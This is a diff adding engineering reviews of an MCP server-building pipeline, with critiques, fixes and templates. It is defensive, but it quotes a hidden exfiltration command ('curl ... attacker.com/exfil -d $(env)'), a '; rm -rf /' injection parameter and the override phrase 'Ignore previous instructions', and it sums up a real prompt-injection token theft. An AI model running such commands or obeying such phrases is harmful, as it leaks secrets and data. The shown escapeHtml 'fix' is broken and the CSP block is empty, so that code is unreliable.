Schema Contract Between Tools and Apps + +**Problem:** No validation that the tool's `structuredContent` matches what the app's `render()` function expects. These can drift silently. + +**Solution:** Generate a shared JSON schema that both the tool's `outputSchema` and the app's `validateData()` reference. + +**Implementation:** +``` +{service}-mcp/ +├── schemas/ +│ ├── contact-grid.schema.json # Shared schema +│ └── dashboard.schema.json +├── src/tools/contacts.ts # outputSchema references this +└── app-ui/contact-grid.html # validateData() references this +``` + +```javascript +// In app template — load schema at build time (inline it) +const EXPECTED_SCHEMA = {"required":["data","meta"],"properties":{"data":{"type":"array"}}}; + +function validateData(data, schema) { + // Validate against the same schema the tool declares as outputSchema + // If mismatch, show diagnostic empty state: "Data shape mismatch — tool returned X, app expected Y" +} +``` + +**Impact:** Catches data shape mismatches during development instead of in production. Enables clear error messages when something goes wrong. + +### MEDIUM Priority + +#### 7. Add Multi-Intent and Correction Handling to System Prompts + +**Problem:** Users often type multi-intent messages ("show me contacts and also create a new one") or corrections ("actually, I meant the other list"). The system prompts don't address these. + +**Solution:** Add explicit instructions to the channel system prompt template: + +``` +MULTI-INTENT MESSAGES: +- If the user asks for multiple things in one message, address them sequentially. +- State which you're handling first and that you'll get to the others. +- Complete one action before starting the next. + +CORRECTIONS: +- If the user says "actually", "wait", "no I meant", "the other one", etc., + treat this as a correction to your previous action. +- If they reference "the other one" or "that one", check the previous results + in the conversation and clarify if needed. +- Never repeat the same action — understand what changed. +``` + +#### 8. Add Token Counting to the Builder Skill + +**Problem:** The builder skill says "keep descriptions under 200 tokens" but doesn't provide measurement. + +**Solution:** Add a token counting step to the build workflow: + +```bash +# Add to build script +node -e " +const tools = require('./dist/tools/index.js'); +// Count tokens per tool description (approximate: words * 1.3) +for (const tool of tools) { + const tokens = Math.ceil(tool.description.split(/\s+/).length * 1.3); + const status = tokens > 200 ? '⚠️' : '✅'; + console.log(\`\${status} \${tool.name}: ~\${tokens} tokens\`); +} +" +``` + +#### 9. Create Per-Service Test Fixtures in the Designer Phase + +**Problem:** The QA skill has generic fixtures, but each service needs fixtures that match its specific data shapes. + +**Solution:** The app designer should create `test-fixtures/{service}/{app-name}.json` alongside each HTML app, using the tool's `outputSchema` to generate realistic test data. + +#### 10. Add Production Quality Monitoring Guidance + +**Problem:** All testing is pre-ship. No guidance on measuring quality in production. + +**Solution:** Add a "Layer 6: Production Monitoring" to the QA skill: + +```markdown +### Layer 6: Production Monitoring (post-ship) + +Metrics to track: +- APP_DATA parse success rate (target: >98%) +- Tool correctness (sample 5% of interactions, LLM-judge) +- Time to first app render (target: <3s P50, <8s P95) +- User retry rate (how often do users rephrase the same request) +- Thread completion rate (% of threads where user gets desired outcome) + +Implementation: Log these metrics in the chat route and aggregate weekly. +``` + +--- + +## The "Magic Moment" Audit + +### What makes it feel AMAZING: +1. **Instant visual gratification.** User types "show me contacts" → within 2s, a beautiful dark-themed data grid appears with sortable columns, status badges, and realistic data. This first impression is the hook. +2. **The dark theme.** It looks like a premium product, not a hackathon demo. The consistent color palette, proper typography, and polished components signal quality. +3. **Contextual empty states.** Instead of "No data" → "Try 'show me all active contacts' or 'list recent invoices'" — this teaches the user what to do next. +4. **Loading skeletons.** The shimmer effect during loading says "something is happening" — much better than a blank screen or spinner. + +### What makes it feel MEDIOCRE: +1. **The 3-8 second wait.** User types → AI processes → tool calls API → AI generates response + APP_DATA → frontend parses → app renders. Every step adds latency. For "show me contacts," 3 seconds feels slow compared to clicking a button in a traditional app. +2. **Stale data between updates.** User types a follow-up → app shows old data → eventually updates. No "updating..." indicator. Feels broken. +3. **Dead interactivity.** Click a contact name in the grid — nothing happens. The data grid looks interactive (hover effects, click cursor) but clicking doesn't navigate to the detail card. +4. **One-way conversation with apps.** The app is a display-only surface. You can't interact with it to drive the conversation — no "click to filter" or "select rows to export." +5. **JSON failures.** When APP_DATA parsing fails (and it does, maybe 5-10% of the time), the app stays on the loading state. The user sees the AI's text response saying "here are your contacts" but the app shows nothing. Confusing and frustrating. + +### What would make it feel MAGICAL: +1. **Streaming data rendering.** As the AI generates the response, the app starts rendering partial data. User sees the table building row by row — feels alive and fast. +2. **Click-to-drill-down.** Click a contact name → detail card opens automatically. Click a pipeline deal → detail view. Apps are interconnected. +3. **App-driven conversation.** Select 3 contacts in the grid → click "Send email" → AI drafts an email to those contacts. The app DRIVES the AI, not just displays data from it. +4. **Live dashboards.** After initial render, the dashboard polls for updates every 30 seconds. Numbers tick up. Sparklines animate. Feels like a real ops dashboard. +5. **Inline editing.** Click a field in the detail card → edit it in place → app calls `sendToHost('tool_call', { tool: 'update_contact', args: { id: '123', name: 'New Name' } })`. Instant save. + +--- + +## Testing Reality Check (what the QA skill actually catches vs what it misses) + +### What it CATCHES (real quality): +| Test | What it validates | Real-world impact | +|---|---|---| +| TypeScript compilation | Code compiles, types are correct | Prevents server crashes | +| MCP Inspector | Protocol compliance | Server works with any MCP client | +| Playwright visual tests | Apps render all 3 states, dark theme, responsive | Users see a polished UI | +| axe-core accessibility | WCAG AA, keyboard nav, screen reader | Accessible to all users | +| XSS payload testing | No script injection via user data | Security against malicious data | +| Chaos testing (500 errors, wrong formats, huge data) | Graceful degradation | App doesn't crash under adverse conditions | +| Static cross-reference | All app IDs consistent across 4 files | No broken routes or missing entries | +| File size budgets | Apps under 50KB | Fast loading | + +### What it MISSES (testing theater): +| Gap | Why it matters | Current state | +|---|---|---| +| **Tool routing accuracy with real LLM** | This is THE quality metric — does the AI pick the right tool? | Fixture files exist but aren't run through an LLM | +| **APP_DATA generation quality** | Does the LLM produce valid JSON that matches the app's expectations? | Not tested at all — parser is tested, generator is not | +| **End-to-end data flow** | Message → AI → tool → API → APP_DATA → app render → correct data | Manual only — no automated E2E test | +| **Multi-step tool chains** | "Find John's email and send him a meeting invite" — requires 3 tool calls in sequence | Not tested — all routing tests are single-tool | +| **Conversation context** | "Show me more details about the second one" — requires memory of previous results | Not addressed in any skill | +| **Real API response shape matching** | Do MSW mocks match real API responses? | Mocks are hand-crafted, never validated against real APIs | +| **Production quality monitoring** | Is quality maintained after ship? | No post-ship quality measurement at all | +| **APP_DATA parse failure rate** | How often does the LLM produce unparseable JSON? | Not measured — the parser silently falls back | + +### The Hard Truth: +The QA skill is excellent at testing the *infrastructure* (server compiles, apps render, accessibility passes, security is clean) but weak at testing the *AI interaction quality* (tool routing, data generation, multi-step flows). The infrastructure is maybe 40% of the user experience; the AI interaction quality is 60%. The testing effort is inverted. + +--- + +## Summary: Top 5 Actions by Impact + +| # | Action | Impact | Effort | Priority | +|---|---|---|---|---| +| 1 | **Route structuredContent directly to apps** (bypass LLM re-serialization) | Eliminates the #1 failure mode, improves reliability from ~90% to ~99% | Medium — requires chat route refactor | CRITICAL | +| 2 | **Adopt MCP Apps protocol** | Tools work in Claude/ChatGPT/VS Code, not just LocalBosses. Future-proofs everything. | High — requires server + app template updates | CRITICAL | +| 3 | **Automated tool routing evaluation with DeepEval** | Transforms testing from theater to real measurement | Medium — requires DeepEval integration + test case authoring | CRITICAL | +| 4 | **Wire up bidirectional communication** (app → host) | Transforms static apps into interactive experiences | Low — handler code is simple | HIGH | +| 5 | **Add "updating" state + schema contracts** | Eliminates stale data confusion and silent data shape mismatches | Low — small template + schema file changes | HIGH | + +--- + +*This review was conducted with one goal: does the end user have an amazing experience? The MCP Factory pipeline is impressively thorough — it's the most complete MCP development framework I've seen. The infrastructure is production-grade. The gap is in the AI-interaction layer: the fragile LLM→JSON→app data flow, the untested tool routing accuracy, and the static nature of the apps. Fix those three things, and this system ships magic.* diff --git a/mcp-factory-reviews/boss-mei-proposals.md b/mcp-factory-reviews/boss-mei-proposals.md new file mode 100644 index 0000000..7feff8a --- /dev/null +++ b/mcp-factory-reviews/boss-mei-proposals.md @@ -0,0 +1,786 @@ +# Boss Mei — Final Review & Improvement Proposals + +**Reviewer:** Director Mei — Enterprise Production & Scale Systems Authority +**Date:** 2026-02-04 +**Scope:** Full MCP Factory pipeline (6 skills) — production readiness assessment +**Verdict:** **NOT READY FOR PRODUCTION AT A BANK** — but with targeted fixes, could be within 2-3 weeks + +--- + +## Pass 1 Notes (Per Skill — Production Readiness Assessment) + +### 1. MCP-FACTORY.md (Pipeline Orchestrator) + +**What's good:** +- Clear 6-phase pipeline with defined inputs/outputs per phase +- Quality gates at every stage — this is production-grade thinking +- Agent parallelization (Phases 2 & 3 concurrent) is correct +- Inventory tracking (30 untested servers) shows awareness of tech debt + +**What concerns me:** +- **No rollback strategy at the pipeline level.** If Phase 4 fails, there's no automated way to undo Phases 2-3 artifacts. Each server build is fire-and-forget. +- **No versioning scheme for servers.** When you have 30+ servers, you need to know which version of the analysis doc produced which server build. There's no traceability. +- **No dependency management between servers.** What happens when two servers share the same API (e.g., GHL CRM tools used across multiple channels)? No guidance on deduplication. +- **Estimated times are optimistic.** "30-60 minutes" for a large API analysis — in practice, complex OAuth APIs (Salesforce, HubSpot) take 3-4 hours with their quirky auth flows. +- **Missing: capacity planning.** 30+ servers all running as stdio processes means 30+ Node.js processes. On a Mac Mini with 8/16GB RAM, that's a problem. + +**Production readiness: 7/10** — solid architecture, needs operational depth. + +--- + +### 2. mcp-api-analyzer (Phase 1) + +**What's good:** +- API style detection (REST/GraphQL/SOAP/gRPC/WebSocket) is comprehensive +- Pagination pattern catalog is excellent — covers all 8 common patterns +- Tool description formula (6-part with "When NOT to use") is research-backed +- Elicitation candidates section shows protocol-awareness +- Content annotations planning (audience + priority) is forward-thinking +- Token budget awareness with specific targets (<5,000 tokens per server) + +**What concerns me:** +- **No rate limit testing strategy.** The analyzer documents rate limits but doesn't recommend actually testing them before production. A sandbox environment should be mandatory. +- **OAuth2 device code flow not covered.** Many IoT and headless APIs use device_code grant — relevant for MCP servers running headlessly. +- **Version deprecation section is thin.** "Check for sunset timelines" is not enough. Need a specific cadence for re-checking API versions (quarterly minimum). +- **Missing: webhook/event-driven patterns.** The doc says "note but don't deep-dive" on webhooks. For production, many tools NEED webhook support for real-time data (e.g., CRM deal updates, payment notifications). +- **Missing: API sandbox/test environment detection.** The analyzer should flag whether the API has a sandbox, because this directly affects how QA can be done. + +**Production readiness: 8/10** — strongest skill, minor gaps. + +--- + +### 3. mcp-server-builder (Phase 2) + +**What's good:** +- Circuit breaker pattern is implemented correctly +- Request timeouts via AbortController — essential, many builders miss this +- Structured logging on stderr (JSON format with request IDs) — production-grade +- Pluggable pagination strategies — well-architected +- Dual transport (stdio + Streamable HTTP) with env var selection +- Health check tool always included — excellent operational practice +- Error classification (protocol vs tool execution) follows spec correctly +- Token budget targets are realistic (<200 tokens/tool, <5,000 total) + +**What concerns me (CRITICAL):** + +1. **Circuit breaker has a race condition.** The `half-open` state allows ONE request through, but if multiple tool calls arrive simultaneously (common in multi-turn conversations), they ALL pass through before the circuit records success/failure. This can overwhelm a recovering API. + +2. **No jitter on retry delays.** `RETRY_BASE_DELAY * Math.pow(2, attempt)` creates thundering herd — all retrying clients hit the API at exactly the same time. Must add random jitter. + +3. **Memory leak risk in HTTP transport session management.** `sessions` Map grows unboundedly. Dead sessions (client disconnected) are only removed on explicit DELETE. In production, network interruptions mean many sessions will never be cleaned up. **This WILL cause OOM over time.** + +4. **Rate limit tracking is per-client-instance, not per-API-key.** If you have multiple MCP server instances behind a load balancer sharing the same API key, each instance tracks its own rate limit counters independently. They'll collectively exceed the limit. + +5. **The `paginate()` method's `any` type casts.** Multiple `as any` casts in the pagination code — if the API response shape changes, these silently pass and produce runtime errors downstream. + +6. **No request deduplication.** If the LLM calls the same tool twice simultaneously (happens with parallel tool calling), two identical API requests fire. For GET it's wasteful, for POST it can create duplicates. + +7. **OAuth2 token refresh has no mutex.** In the client_credentials pattern, if the token expires and 5 requests arrive simultaneously, all 5 will attempt to refresh the token. Need a lock/semaphore. + +8. **`AbortController` timeout in the `finally` block is correct**, but the timeout callback still fires after the controller is garbage-collected in some Node.js versions. Should explicitly call `controller.abort()` in the clearTimeout path for safety. + +**Production readiness: 6/10** — good foundation, but the concurrency bugs and memory leak are production-killers. + +--- + +### 4. mcp-app-designer (Phase 3) + +**What's good:** +- Design system is comprehensive (color palette, typography, spacing tokens) +- WCAG AA compliance is explicitly called out with contrast ratios +- 9 app type templates covering common patterns +- Three-state rendering (loading/empty/data) is mandatory +- Error boundary with window.onerror — essential for iframe stability +- Bidirectional communication (sendToHost) enables app→host interaction +- Accessibility: sr-only, focus management, prefers-reduced-motion +- Interactive Data Grid with sort, filter, expand, bulk select — feature-rich + +**What concerns me:** + +1. **XSS in `escapeHtml()` function uses DOM-based escaping.** `document.createElement('div').textContent = text` is safe in browsers, but if anyone ever renders this server-side (SSR), it won't work. Also, this approach creates a DOM element per escape call — at scale (1000 rows), that's 6000+ DOM element creations. + +2. **Polling fallback has no circuit breaker.** If `/api/app-data` is down, the app retries 20 times with increasing delays. That's up to 20 failed requests per app per session. With 30+ apps, that's 600 failed requests hammering a broken endpoint. + +3. **`postMessage` has NO origin validation.** The template accepts messages from ANY origin (`*`). In production, this means any page that can embed the iframe (or any browser extension) can inject arbitrary data into the app. This is a known security vulnerability pattern. + +4. **`setInterval(pollForData, 3000)` in the old reference** — though the newer template uses exponential backoff, verify all existing apps use the new pattern. Fixed-interval polling at 3s is a DoS vector. + +5. **Interactive Data Grid's `handleSearch` has double-sort bug.** When search + sort are both active, `handleSort` is called twice, toggling the direction back. The comment says "toggle it back" but this is a UX bug. + +6. **Missing: Content Security Policy.** No CSP meta tag in the template. Single-file HTML apps with inline scripts need `script-src 'unsafe-inline'`, but should at least restrict form actions, frame ancestors, and connect-src. + +7. **Missing: iframe sandboxing guidance.** The apps run in iframes but there's no guidance on the `sandbox` attribute the host should apply. + +**Production readiness: 7/10** — solid design system, security gaps need immediate attention. + +--- + +### 5. mcp-localbosses-integrator (Phase 4) + +**What's good:** +- Complete file-by-file checklist (5 files to update) +- System prompt engineering guidelines are excellent (structured, budgeted, with few-shot examples) +- APP_DATA failure mode catalog with parser pattern — very production-aware +- Thread state management with localStorage limits documented +- Rollback strategies (git, feature-flag, manifest-based) — good operational thinking +- Integration validation script that cross-references all 4 files — catches orphaned entries +- Intake question quality criteria with good/bad examples +- Token budget targets for prompts (<500 channel, <300 addon) + +**What concerns me:** + +1. **APP_DATA parsing is fragile by design.** The entire data flow depends on the LLM generating valid JSON inside a comment block. Research shows LLMs produce malformed JSON 5-15% of the time. The fallback parser helps, but this is an architectural fragility — you're trusting probabilistic output for deterministic rendering. + +2. **No schema validation on APP_DATA before sending to app.** The parser extracts JSON, but nothing validates it matches what the app expects. A valid JSON object with wrong field names silently produces broken apps. + +3. **Thread cleanup relies on client-side code.** The `cleanupOldThreads` function is recommended but not enforced. Without it, localStorage grows indefinitely. At 5MB, you hit `QuotaExceededError` and threads start silently failing. + +4. **System prompt injection risk.** The system prompt includes user-facing instructions like "TOOL SELECTION RULES." If an attacker puts "Ignore previous instructions" in a chat message, the LLM might comply because the system prompt wasn't hardened against injection. Need system prompt hardening techniques. + +5. **No rate limiting on thread creation.** A user (or bot) can create unlimited threads, each consuming localStorage and server-side context. No guard against abuse. + +6. **Validation script uses regex to parse TypeScript.** This is inherently fragile — template strings, multi-line expressions, and comments can all cause false positives/negatives. AST-based parsing (ts-morph or TypeScript compiler API) would be more reliable. + +7. **Missing: canary deployment guidance.** The feature-flag strategy is described but there's no guidance on gradually rolling out a channel to a subset of users before full deployment. + +**Production readiness: 7/10** — operationally aware, but the APP_DATA architectural fragility is a long-term concern. + +--- + +### 6. mcp-qa-tester (Phase 5) + +**What's good:** +- 6-layer testing architecture with quantitative metrics — extremely thorough +- MCP protocol compliance testing (Layer 0) using MCP Inspector + custom JSON-RPC client +- structuredContent schema validation against outputSchema +- Playwright visual testing + BackstopJS regression +- axe-core accessibility automation with score thresholds +- Performance benchmarks (cold start, latency, memory, file size) +- Chaos testing (API 500s, wrong formats, huge datasets, rapid-fire messages) +- Security testing (XSS payloads, postMessage origin, key exposure) +- Comprehensive test data fixtures library (edge cases, adversarial, unicode, scale) +- Automated QA shell script with persistent reporting +- Regression baselines and trending + +**What concerns me:** + +1. **Layer 4 (live API testing) is the weakest link.** The credential management strategy is documented but manual. With 30+ servers, manually managing .env files is error-prone. Need a secrets manager (Vault, AWS Secrets Manager, or at minimum encrypted at rest). + +2. **No test isolation.** Jest tests with MSW are good, but there's no guidance on ensuring tests don't interfere with each other. If one test modifies MSW handlers and doesn't clean up, subsequent tests get unexpected behavior. + +3. **MCP protocol test client is too simple.** The `MCPTestClient` reads lines, but MCP over stdio sends JSON-RPC messages that may span multiple lines (when using content with newlines). Need proper message framing. + +4. **No load/stress testing.** Performance testing covers cold start and single-request latency, but not concurrent load. What happens when 10 users hit the same MCP server simultaneously over HTTP? No guidance. + +5. **Tool routing tests are framework-only, not actual LLM tests.** The routing fixtures validate that the expected tools exist, but don't actually test that the LLM selects the right tool. This is the MOST IMPORTANT test for production, yet it requires the LLM in the loop — there's no harness for that. + +6. **Missing: smoke test for deployment.** After deploying to production, need a post-deployment smoke test that validates the server is reachable, tools respond, and at least one app renders. The QA script assumes a development environment. + +7. **BackstopJS baseline management at scale.** With 30+ servers × 5+ apps × 3 viewports = 450+ screenshots. That's a lot of baselines to maintain. Need guidance on selective regression (only re-test changed servers). + +**Production readiness: 8/10** — most comprehensive testing framework I've seen for MCP, but needs LLM-in-the-loop testing and load testing. + +--- + +## Pass 2 Notes (Operational Gaps, Race Conditions, Security Issues) + +### Can a team operate 30+ servers built with these skills? + +**Short answer: Not without additional operational infrastructure.** + +Gaps: +1. **No centralized health dashboard.** Each server has a `health_check` tool, but nothing aggregates health across all 30+ servers. An operator can't answer "which servers are healthy right now?" without calling each one individually. + +2. **No alerting integration.** The structured logging is good, but there's no guidance on connecting it to PagerDuty, Slack alerts, or any alerting system. In production, you need to know when circuit breakers trip within minutes, not hours. + +3. **No centralized log aggregation.** Each server logs to stderr. With 30+ servers, that's 30+ separate log streams. Need guidance on piping to a centralized system (stdout → journald → Loki/Datadog/CloudWatch). + +4. **No deployment automation.** Building a server is documented, deploying it is not. There's no Dockerfile, docker-compose, systemd service file, or PM2 ecosystem file. Each server is assumed to run manually. + +5. **No dependency update strategy.** 30+ servers × package.json = 30+ sets of npm dependencies. When MCP SDK ships a breaking change, who updates all 30? Need a monorepo or automated dependency update workflow. + +### Incident Response + +**What happens when an API goes down at 3 AM?** + +The circuit breaker opens (good), the health_check shows "unhealthy" (good), but: +- Nobody is alerted +- No runbook exists for "API is down" +- No guidance on whether to restart the server, wait, or disable the channel +- No SLA expectations documented per API + +**What happens when a tool returns wrong data?** + +- The LLM generates APP_DATA based on wrong data +- The app renders it — user sees incorrect information +- No data validation layer between tool output and LLM consumption +- No "data looks suspicious" detection + +### Race Conditions Identified + +1. **Circuit breaker half-open concurrent requests** (described in Pass 1) — CRITICAL +2. **OAuth token refresh thundering herd** — CRITICAL +3. **localStorage thread cleanup vs active write** — if cleanup runs while a thread is being created, the new thread may be deleted immediately +4. **Rapid postMessage updates** — the template handles this via deduplication (`JSON.stringify` comparison), but this comparison is O(n) on data size and blocks the UI thread for large datasets + +### Memory Leak Risks + +1. **HTTP session Map** — unbounded growth, no TTL, no max size — CRITICAL +2. **Polling timers in apps** — if `clearTimeout(pollTimer)` fails (e.g., render throws before clearing), orphaned timers accumulate +3. **AbortController in retry loops** — each retry creates a new AbortController. If a request hangs past the timeout but doesn't complete, the old controller stays in memory +4. **Logger request IDs** — no concern, short-lived strings +5. **Tool registry lazy loading** — tools load once, handlers reference client — no leak here + +### Security Posture Assessment + +**Adequate for internal tools? Yes, mostly.** +**Adequate for production at a bank? NO.** + +Critical gaps: +1. **No input sanitization between LLM output and tool parameters.** The LLM generates tool arguments, Zod validates the schema, but doesn't sanitize for injection. A prompt-injected LLM could pass `; rm -rf /` as a parameter if the tool eventually shells out. +2. **No postMessage origin validation in app template** — any page can inject data +3. **No CSP in app template** — inline scripts are unconstrained +4. **API keys stored in plain .env files** — no encryption at rest +5. **No audit logging** — tool calls are logged but not in a tamper-proof audit trail +6. **No rate limiting on tool calls** — a compromised LLM could invoke destructive tools in a tight loop + +--- + +## Research Findings (Production Patterns and Incidents) + +### Real-World MCP Security Incidents (2025-2026) + +1. **Supabase MCP "Lethal Trifecta" Attack (mid-2025):** Cursor agent running with privileged service-role access processed support tickets containing hidden SQL injection. Attacker exfiltrated integration tokens through a public thread. Root cause: privileged access + untrusted input + external communication channel. + +2. **Asana MCP Data Exposure (June 2025):** Customer data leaked between MCP instances due to a bug. Asana published a post-mortem. Lesson: multi-tenant MCP deployments need strict data isolation. + +3. **492 Exposed MCP Servers (2025):** Trend Micro found 492 MCP servers publicly exposed with no authentication. Many had command-execution flaws. Lesson: MCP servers MUST NOT be internet-accessible without authentication. + +4. **mcp-remote Command Injection:** Vulnerability in the mcp-remote package allowed command injection. Lesson: MCP ecosystem supply chain is immature — audit dependencies. + +5. **Tool Description Injection (ongoing):** Researchers demonstrated that malicious tool descriptions can inject hidden prompts. The weather_lookup example: hiding `curl -X POST attacker.com/exfil -d $(env)` in a tool description. Lesson: tool descriptions are an attack vector. + +### Production Architecture Patterns (2025-2026) + +1. **MCP Gateway Pattern (Microsoft, IBM, Envoy):** A reverse proxy that fronts multiple MCP servers behind one endpoint. Adds session-aware routing, centralized auth, policy enforcement, observability. Microsoft's `mcp-gateway` is Kubernetes-native. IBM's `ContextForge` federates MCP + REST + A2A. Envoy AI Gateway provides MCP proxy with multiplexed streams. + +2. **Container-Per-Server (ToolHive, Docker):** Each MCP server runs in its own container. ToolHive by Stacklok provides container lifecycle management with zero-config observability. Docker's blog recommends using Docker as the MCP server gateway. Key insight: containers provide process isolation + resource limits that stdio doesn't. + +3. **Sidecar Observability (ToolHive):** Rather than modifying each MCP server, a sidecar proxy intercepts MCP traffic and emits OpenTelemetry spans. Zero server modification. This is the recommended approach for retrofitting observability onto existing servers. + +### Observability Best Practices + +From Zeo's analysis of 16,400+ MCP server implementations: +- **73% of production outages start at the transport/protocol layer** — yet it's the most overlooked +- **Agents fail 20-30% of the time without recovery** — human oversight is essential +- **Method-not-found errors (-32601) above 0.5% indicate tool hallucination** — a critical reliability signal +- **JSON-RPC parse errors (-32700) spikes correlate with buggy clients or scanning attempts** +- Three-layer monitoring model: Transport → Tool Execution → Task Completion + +--- + +## Proposed Improvements (Specific, Actionable, With Corrected Code) + +### CRITICAL: Fix Circuit Breaker Race Condition + +**Problem:** Half-open state allows unlimited concurrent requests. +**Fix:** Add a mutex/semaphore so only ONE request passes through in half-open state. + +```typescript +class CircuitBreaker { + private state: CircuitState = "closed"; + private failureCount = 0; + private lastFailureTime = 0; + private halfOpenLock = false; // ADD THIS + private readonly failureThreshold: number; + private readonly resetTimeoutMs: number; + + constructor(failureThreshold = 5, resetTimeoutMs = 60_000) { + this.failureThreshold = failureThreshold; + this.resetTimeoutMs = resetTimeoutMs; + } + + canExecute(): boolean { + if (this.state === "closed") return true; + if (this.state === "open") { + if (Date.now() - this.lastFailureTime >= this.resetTimeoutMs) { + // Only allow ONE request through in half-open + if (!this.halfOpenLock) { + this.halfOpenLock = true; + this.state = "half-open"; + logger.info("circuit_breaker.half_open"); + return true; + } + return false; // Another request already testing + } + return false; + } + // half-open: already locked, reject additional requests + return false; + } + + recordSuccess(): void { + this.halfOpenLock = false; + if (this.state !== "closed") { + logger.info("circuit_breaker.closed", { previousFailures: this.failureCount }); + } + this.failureCount = 0; + this.state = "closed"; + } + + recordFailure(): void { + this.halfOpenLock = false; + this.failureCount++; + this.lastFailureTime = Date.now(); + if (this.failureCount >= this.failureThreshold || this.state === "half-open") { + this.state = "open"; + logger.warn("circuit_breaker.open", { + failureCount: this.failureCount, + resetAfterMs: this.resetTimeoutMs, + }); + } + } +} +``` + +### CRITICAL: Add Jitter to Retry Delays + +**Problem:** Exponential backoff without jitter causes thundering herd. +**Fix:** + +```typescript +// BEFORE (bad): +await this.delay(RETRY_BASE_DELAY * Math.pow(2, attempt)); + +// AFTER (correct): +const baseDelay = RETRY_BASE_DELAY * Math.pow(2, attempt); +const jitter = Math.random() * baseDelay * 0.5; // 0-50% jitter +await this.delay(baseDelay + jitter); +``` + +### CRITICAL: Fix HTTP Session Memory Leak + +**Problem:** Sessions Map grows without bound. +**Fix:** Add TTL-based cleanup and max session limit. + +```typescript +// In startHttpTransport(): +const sessions = new Map(); +const MAX_SESSIONS = 100; +const SESSION_TTL_MS = 30 * 60 * 1000; // 30 minutes + +// Session cleanup interval +const cleanupInterval = setInterval(() => { + const now = Date.now(); + for (const [id, session] of sessions.entries()) { + if (now - session.lastActivity > SESSION_TTL_MS) { + logger.info("session.expired", { sessionId: id }); + sessions.delete(id); + } + } +}, 60_000); // Check every minute + +// Limit max sessions +function getOrCreateSession(sessionId?: string): StreamableHTTPServerTransport { + if (sessionId && sessions.has(sessionId)) { + const session = sessions.get(sessionId)!; + session.lastActivity = Date.now(); + return session.transport; + } + if (sessions.size >= MAX_SESSIONS) { + // Evict oldest session + let oldest: string | null = null; + let oldestTime = Infinity; + for (const [id, s] of sessions.entries()) { + if (s.lastActivity < oldestTime) { + oldestTime = s.lastActivity; + oldest = id; + } + } + if (oldest) sessions.delete(oldest); + } + // Create new session... +} + +// Clean up on server shutdown +process.on('SIGTERM', () => { + clearInterval(cleanupInterval); + sessions.clear(); +}); +``` + +### CRITICAL: Add OAuth Token Refresh Mutex + +**Problem:** Concurrent requests all try to refresh expired token simultaneously. +**Fix:** + +```typescript +export class APIClient { + private accessToken: string | null = null; + private tokenExpiry: number = 0; + private refreshPromise: Promise | null = null; // ADD THIS + + private async getAccessToken(): Promise { + // Return cached token if valid (5 min buffer) + if (this.accessToken && Date.now() < this.tokenExpiry - 300_000) { + return this.accessToken; + } + + // If already refreshing, wait for that to complete + if (this.refreshPromise) { + return this.refreshPromise; + } + + // Start a new refresh and let all concurrent callers share it + this.refreshPromise = this._doRefresh(); + try { + const token = await this.refreshPromise; + return token; + } finally { + this.refreshPromise = null; + } + } + + private async _doRefresh(): Promise { + // ... actual token refresh logic ... + } +} +``` + +### HIGH: Add postMessage Origin Validation to App Template + +```javascript +// In the message event listener: +window.addEventListener('message', (event) => { + // Validate origin — only accept from our host + const allowedOrigins = [ + window.location.origin, + 'http://localhost:3000', + 'http://192.168.0.25:3000', + // Add production origin + ]; + + // In production, be strict. In development, accept any. + const isDev = window.location.hostname === 'localhost' || window.location.hostname === '127.0.0.1'; + if (!isDev && !allowedOrigins.includes(event.origin)) { + console.warn('[App] Rejected postMessage from untrusted origin:', event.origin); + return; + } + + try { + const msg = event.data; + // ... existing handler logic ... + } catch (e) { + console.error('postMessage handler error:', e); + } +}); +``` + +### HIGH: Add CSP Meta Tag to App Template + +```html + + + + + + {App Name} +``` + +### HIGH: Replace DOM-Based escapeHtml with String-Based + +```javascript +// BEFORE (creates DOM elements — slow at scale): +function escapeHtml(text) { + if (!text) return ''; + const div = document.createElement('div'); + div.textContent = String(text); + return div.innerHTML; +} + +// AFTER (string replacement — 10x faster, SSR-safe): +function escapeHtml(text) { + if (!text) return ''; + return String(text) + .replace(/&/g, '&') + .replace(//g, '>') + .replace(/"/g, '"') + .replace(/'/g, '''); +} +``` + +### HIGH: Add Centralized Health Dashboard Tool + +Add to MCP-FACTORY.md — a meta-server that aggregates health: + +```typescript +// health-aggregator.ts — runs as a separate process +// Calls health_check on every registered MCP server +// Exposes a dashboard endpoint + +interface ServerHealth { + name: string; + status: 'healthy' | 'degraded' | 'unhealthy' | 'unreachable'; + lastChecked: string; + latencyMs: number; + error?: string; +} + +async function checkAllServers(): Promise { + const servers = loadServerRegistry(); // Read from config + return Promise.all(servers.map(async (server) => { + try { + const result = await callMCPTool(server.command, 'health_check', {}); + return { name: server.name, ...JSON.parse(result), lastChecked: new Date().toISOString() }; + } catch (e) { + return { name: server.name, status: 'unreachable', lastChecked: new Date().toISOString(), latencyMs: -1, error: String(e) }; + } + })); +} +``` + +### MEDIUM: Add Dockerfile Template to Server Builder + +```dockerfile +# {service}-mcp/Dockerfile +FROM node:22-alpine AS builder +WORKDIR /app +COPY package*.json ./ +RUN npm ci --production=false +COPY . . +RUN npm run build + +FROM node:22-alpine +WORKDIR /app +COPY --from=builder /app/dist ./dist +COPY --from=builder /app/node_modules ./node_modules +COPY --from=builder /app/package.json ./ + +# Non-root user +RUN addgroup -g 1001 mcp && adduser -u 1001 -G mcp -s /bin/sh -D mcp +USER mcp + +# Health check +HEALTHCHECK --interval=30s --timeout=10s --start-period=5s \ + CMD node -e "fetch('http://localhost:3000/health').then(r => process.exit(r.ok ? 0 : 1)).catch(() => process.exit(1))" + +# Default to HTTP transport in containers +ENV MCP_TRANSPORT=http +ENV MCP_HTTP_PORT=3000 +EXPOSE 3000 + +CMD ["node", "dist/index.js"] +``` + +### MEDIUM: Add Interactive Data Grid Search Double-Sort Fix + +```javascript +// BEFORE (buggy — double toggles sort direction): +function handleSearch(query) { + gridState.searchQuery = query.toLowerCase().trim(); + // ... filtering logic ... + if (gridState.sortCol) { + handleSort(gridState.sortCol); + gridState.sortDir = gridState.sortDir === 'asc' ? 'desc' : 'asc'; + handleSort(gridState.sortCol); + } else { + renderRows(); + } +} + +// AFTER (correct — apply sort without toggling): +function handleSearch(query) { + gridState.searchQuery = query.toLowerCase().trim(); + if (!gridState.searchQuery) { + gridState.filteredItems = [...gridState.items]; + } else { + gridState.filteredItems = gridState.items.filter(item => + Object.values(item).some(v => + v != null && String(v).toLowerCase().includes(gridState.searchQuery) + ) + ); + } + // Re-apply current sort WITHOUT toggling direction + if (gridState.sortCol) { + applySortToFiltered(); // New function that sorts without toggling + } + renderRows(); +} + +function applySortToFiltered() { + const colKey = gridState.sortCol; + if (!colKey) return; + gridState.filteredItems.sort((a, b) => { + let aVal = a[colKey], 